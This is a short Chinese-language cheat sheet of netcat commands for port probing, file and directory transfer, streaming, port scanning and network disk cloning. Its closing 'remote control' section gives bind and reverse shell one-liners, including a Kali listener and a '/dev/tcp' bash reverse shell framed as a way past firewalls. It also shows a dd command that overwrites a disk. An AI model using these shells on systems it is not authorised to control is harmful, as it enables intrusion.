记NC的一些基本用法

nc -nv 1.1.1.1 110
nc -nv 1.1.1.1 25
nc -nv 1.1.1.1 80

nc传输文本信息

A $nc -l -p port //A作为服务端
B $nc -nv  A的ip port //B 客户端
B $ls -l |nc -nv A的ip port

nc--传输文件/目录

传输文件

A :nc -lp port >1.mp4    //-lp侦听端口 A 作为接收端 

B:nc -nv Aip port < 1.mp4 -q 1  //B作为发送端

A:$nc -lp port < 2.3.mp4 -q 1   //A作为服务端,等待B来下载
B:$nc
-nv Aip port >b.mp4 //B作为客户端,访问A,并下载

传输目录

A: tar -cvf - music/ |nc -lp port -q 1  // -lp 侦听端口

B:nc -nv Aip  port |tar -xvf -

nc-流媒体服务

A:#cat 1.mp4 |nc -lp port

B:#nc -nv Aip port | mplayer -vo x11 -cache 3000-

nc-端口扫描

nc -nvz ip 1-65535

nc -vnzu ip 1-1024

nc -v 192.168.1.1 80 探测80端口是否开启

nc-远程克隆硬盘,远程电子取证,可以将目标服务器硬盘或内存远程复制,内容比较多,传递时间比较长。

A:#nc -lp port |dd of=/dev/sda

B:#dd if=/dev/sda |nc -nv ip port -q 1

nc-远程控制

正向:B获得A的shell

A:#nc -lp port -c bash //若A为windows,则将bash改为cmd

B:#nc -nv Aip port  //B可以使用A的bash

反向:A获得B的shell  当防火墙禁止外来流量访问拿shell时,可通过攻击机反向监测,被攻击机主动连接攻击机。

A:#nc -lp port
B:#nc
-nv Aip port -c bash

kali反向

kali: nc -lvnp port
内网机器:bash -i >&/dev/tcp/kaliip/port 0>&1
例如
kali: nc -lvnp 4444
内网机器:bash -i >&/dev/tcp/192.168.137.135/4444 0>&1

ncat加密传输

A#ncat -c bash --allow Bip -vnl port --ssl

B:ncat -nv Aip port --ssl

不同平台的nc参数功能可能不同

原文地址:https://www.cnblogs.com/1go0/p/9988309.html